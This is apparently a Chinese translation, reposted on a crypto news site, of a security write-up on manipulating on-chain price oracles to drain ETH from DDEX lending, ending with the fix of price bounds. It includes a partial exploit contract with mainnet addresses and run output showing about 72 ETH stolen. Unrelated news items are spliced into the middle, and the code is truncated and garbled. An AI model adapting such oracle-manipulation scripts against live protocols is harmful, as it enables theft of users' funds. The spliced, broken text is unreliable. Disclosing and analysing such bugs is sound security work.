ETH:通过操控抵押品价格预言机牟利

译文出自:登链翻译计划

译者:翻译小组

校对:Tiny熊

太长不看版

因依赖链上去中心化的价格预言而不验证返回的价格,DDEX和bZx容易受到价格操纵攻击。这导致DDEX的ETH/DAI市场损失ETH流动性,以及bZx中所有损失流动性资金,在本文中,将介绍价格操纵攻击的原理、如何实施的攻击、以及如何应对。

什么是去中心化贷款?

首先,让我们谈谈传统贷款。贷款时,通常需要提供某种抵押品,这样,如果你拖欠贷款,贷方便可以扣留抵押品。为了确定你需要提供多少抵押品,贷方通常会知道或能够可靠地计算出抵押品的公平市场价值(FMV)。

在去中心化贷款中,除了贷方现在是与外界隔离的智能合约之外,其他过程相同。这意味着它不能简单地“知道”你提供的任何抵押品的FMV。

为了解决此问题,开发人员指示智能合约查询价格预言机,该预言机接受代币地址并返回对应计价货币(例如ETH或USD)的当前价格。不同的DeFi项目采用了不同的方法来实现此预言机,但通常可以将它们全部归类为以下五种方式之一(尽管某些实现比其他实现更模糊):

链下中心化预言机这种类型的预言机只接受来自链下价格来源的新价格,通常来自项目控制的帐户。由于需要使用新汇率快速通知更新预言机,因此该帐户通常是EOA,而不是多签钱包。可能需要进行一些合理的检查,以确保价格波动不会太大。Compound和Synthetix的大多数资产使用这种类型的预言机。

NEAR宣布DODO为首选DEX 并通过Proximity Labs提供750万美元激励资金:12月28日消息,去中心化协议NEAR Protocol宣布DODO将作为其首选去中心化交易所 (DEX) 推出,并计划通过Proximity Labs提供750万美元(通过其3.5亿美元的DeFi赠款DAO提供)DODO Aurora激励资金。(the crypto)[2021/12/28 8:09:50]

链下去中心化预言机这种预言机从多个链下来源接受新价格,并通过数学函数(例如平均值)合并这些值。在此模型中,通常使用多签名钱包来管理授权价格源列表。Maker针对ETH和其他资产使用这种类型的预言机。

链上中心化预言机这种类型的预言机使用链上价格来源(例如DEX)确定资产价格。但是,只有授权账号才能触发预言机从链上源读取。像链下中心化预言机一样,这种类型的预言机需要快速更新,因此授权触发帐户可能是EOA而不是多签钱包。dYdX和Nuo针对一些资产使用这种类型的预言机。

链上去中心化预言机这种预言机使用链上价格来源确定资产价格,但是任何人都可以更新。可能需要进行一些合理检查,以确保价格波动不会太大。DDEX将这种类型的预言机用于DAI,而bZx对所有资产使用这种类型的预言机。

常量预言机这种类型的预言机简单地返回一个常数,通常用于稳定币。由于USDC钉住美元,因此上述几乎所有项目都将这种类型的预言机用于USDC。

Coinbase通过GitHub征求公众关于数字资产政策建议的意见:10月16日消息,Coinbase 通过 GitHub 征求公众关于数字资产政策建议的公众意见,称这代表了 Coinbase 对美国数字资产监管框架的真诚建议,也是其首次使用 GitHub 征求有关政策事项的反馈,并鼓励大家参与讨论数字资产在大家经济中的未来作用。[2021/10/16 20:34:32]

问题

在寻找其他易受攻击的项目时,我看到了这条推文:

老实说,我担心他们会将其用作价格喂价源。如果我的预感是正确的,那很容易受到攻击。

—Vitalik非以太赠予者(uint256eth2daiPrice=getEth2DaiPrice();if(eth2daiPrice>0){_price=makerDaoPrice

uint256uniswapPrice=getUniswapPrice();if(uniswapPrice>0){_price=makerDaoPrice

return_price;}functiongetEth2DaiPrice()publicviewreturns(uint256){if(Eth2Dai

uint256bidDai=Eth2Dai

else{returnbidPrice

}functiongetUniswapPrice()publicviewreturns(uint256){uint256ethAmount=UNISWAP

声音 | 软件开发者:担心Parity通过DAO开放维护工作后会威胁以太坊网络安全:此前Parity节点同步以太坊主网出现问题,许多推特用户指出,只有大约20%的以太坊节点在Parity上运行。然而,根据软件开发者Liam Aharon的说法,如果任何此类攻击的目标是Geth节点,就有可能摧毁整个以太坊网络。他表示:“我很担心,因为本月Parity宣布他们将逐步减少对Parity Ethereum的支持,并将通过DAO来开放其客户端维护工作。如果这种情况成为现实,类似这次的攻击将摧毁整个网络,而不仅仅是带来不便。”注:PeckShield安全人员此前研究发现,由于以太坊Parity客户端存在某种缺陷,当它收到一个问题区块时,下个有同样哈希的合法区块将不被处理。具体而言:攻击者可向Parity客户端发送合法header+非法body,使得之后的合法区块header+body被Partiy客户端过滤,但可以被geth等客户端接收,进而可能会导致以太坊主网意外“分叉”。Parity客户端目前占以太坊主网的22.08%,主要应用于矿池、交易所等相关节点。(Finance Magnates)[2020/1/1]

else{returnuniswapPrice;}}functiongetMakerDaoPrice()publicviewreturns(uint256){(bytes32value,boolhas)=makerDaoOracle

else{return0;}}

动态 | Liquid交易所允许用户通过Visa和万事达卡购买虚拟货币:据cointelegraph报道,日本数字货币交易所Liquid称,用户可以通过Visa和万事达卡购买虚拟货币。[2019/2/21]

参考源码

为了触发更新并使预言机刷新其存储的值,用户只需调用updatePrice()即可。

functionupdatePrice()publicreturns(bool){uint256_price=peek();if(_price!=0){price=_price;emitUpdatePrice(price);returntrue;}else{returnfalse;}}

参考源码

攻击原理

假设我们可以操纵DAI/USD的价格表现。如果是这种情况,我们希望使用它借用系统中的所有ETH,同时提供尽可能少的DAI。为此,我们可以降低ETH/USD的表现价格或增加DAI/USD的表现价格。由于我们已经假设DAI/USD的表现价值是可操纵的,因此我们选择后者。

为了增加DAI/USD的表现价格,我们可以增加ETH/USD的表现价格,或者降低ETH/DAI的表现价格。基于当前意图和目的,操纵Maker的预言是不可能的,因此我们将尝试降低ETH/DAI的表现价值。

编者注,因为DAI/USD价格=ETH/USD价格÷ETH/DAI价格

科罗拉多州通过支持利用区块链保管政府记录和网络安全的法案:据cointelegraph消息,美国科罗拉多州参议院5月7日通过了一项法案,涉及利用区块链技术进行政府记录的保管及网络安全。参议院法案(SB)18-086要求州长信息技术办公室(OIT),州政府部门和监管机构部门考虑使用加密技术和区块链技术,以保护机密状态的记录免受犯罪,未经授权,无意的操纵或盗窃。[2018/5/9]

预言机通过Eth2Dai取当前要价和当前出价的平均值来计算ETH/DAI的值。为了降低此值,我们需要通过填充现有订单来降低当前出价,然后通过下新订单来降低当前要价。

但是,这需要大量的初始投资(因为我们需要先填写订单,然后再生成相等数量的订单),并且实施起来并不容易。另一方面,我们可以通过在Uniswap大量交易DAI来影响Uniswap中的价格。因此,我们的目标是绕过Eth2Dai逻辑并操纵Uniswap价格。

为了绕过Eth2Dai,我们需要控制价格的波动幅度。我们可以通过以下两种方式之一进行操作:

清除订单的一侧,而保留另一侧。这导致价差正增长

通过列出极端的买入或卖出订单来强制执行交叉的订单。这会导致利差下降。

尽管选项2不会因不利订单而造成任何损失,但SafeMath不允许使用交叉订单,因此我们无法使用。相反,我们会通过清除订单的一侧来强制产生较大的正价差。这将导致DAI预言机回退到Uniswap来确定DAI的价格。然后,我们可以通过购买大量DAI来降低DAI/ETH的Uniswap价格。一旦操纵了DAI/USD的表现价值,便像往常一样借贷很简单。

攻击演示

以下脚本将通过以下方式获利约70ETH:

清除Eth2Dai的卖单,直到价差足够大,以致预言机拒绝价格

从Uniswap购买更多DAI,价格从213DAI/ETH降至13DAI/ETH

用少量DAI(?2500)借出所有可用ETH(?120)

将我们从Uniswap购买的DAI卖回Uniswap

将我们从Eth2Dai购买的DAI卖回Eth2Dai

重置预言机(不想让其他人滥用我们的优惠价格)

contractDDEXExploitisScript,Constants,TokenHelper{OracleLikeprivateconstantETH_ORACLE=OracleLike(0x8984F1CFf1d614a7404b0cfE97C6fa9110b93Bd2);DaiOracleLikeprivateconstantDAI_ORACLE=DaiOracleLike(0xeB1f1A285fee2AB60D2910F2786E1D036E09EAA8);ERC20LikeprivateconstantHYDRO_ETH=ERC20Like(0x000000000000000000000000000000000000000E);HydroLikeprivateconstantHYDRO=HydroLike(0x241e82C79452F51fbfc89Fac6d912e021dB1a3B7);uint16privateconstantETHDAI_MARKET_ID=1;uintprivateconstantINITIAL_BALANCE=25000ether;functionsetup()public{name("ddex-exploit");blockNumber(8572000);}functionrun()public{begin("exploit")

functioncheckRates()external{uintethPrice=ETH_ORACLE

uintprivateboughtFromMatchingMarket=0;functionskewRates()external{skewUniswapPrice();skewMatchingMarket();require(DAI_ORACLE

functionskewUniswapPrice()internal{DAI

functionskewMatchingMarket()internal{uintstart=DAI

boughtFromMatchingMarket=DAI

functionsteal()external{HydroLike

functioncleanup()external{DAI

functioncheckProfits()external{printf("profits=%

}/*###runningscript"ddex-exploit"atblock8572000####executingstep:exploit#####calling:checkRates()eth=213.440000000000000000dai=1.003140638067989051#####calling:skewRates()#####calling:checkRates()eth=213.440000000000000000dai=16.058419875880325580#####calling:steal()ethWanted=122.103009983203364425daiNeeded=2435.392672403537525078#####calling:cleanup()#####calling:checkProfits()profits=72.140629996890984407####finishedexecutingstep:exploit*/

解决方案

DDEX团队通过部署新的预言机解决了此问题这对DAI的价格设置了合约价格界限,目前将其设置为0.95和1.05。

本文来源于非小号媒体平台:

登链社区

现已在非小号资讯平台发布105篇作品,

非小号开放平台欢迎币圈作者入驻

入驻指南:

/apply_guide/

本文网址:

/news/9559363.html

免责声明:

1.资讯内容不构成投资建议,投资者应独立决策并自行承担风险

2.本文版权归属原作所有,仅代表作者本人观点,不代表非小号的观点或立场

上一篇:

币安为何推出第三条链?这对BNB意味着什么?

郑重声明: 本文版权归原作者所有, 转载文章仅为传播更多信息之目的, 如作者信息标记有误, 请第一时间联系我们修改或删除, 多谢。

金星链

狗狗币DEF:预言机攻击与人为无常损失

Part.1Insight 预言机攻击与解决方案 随着DeFi市场的兴起,整个DeFi世界的安全性也经历了严峻的考验,多起攻击事件接连发生,给DeFi用户和项目方造成了巨大的资产损失.

[0:62ms0-0:622ms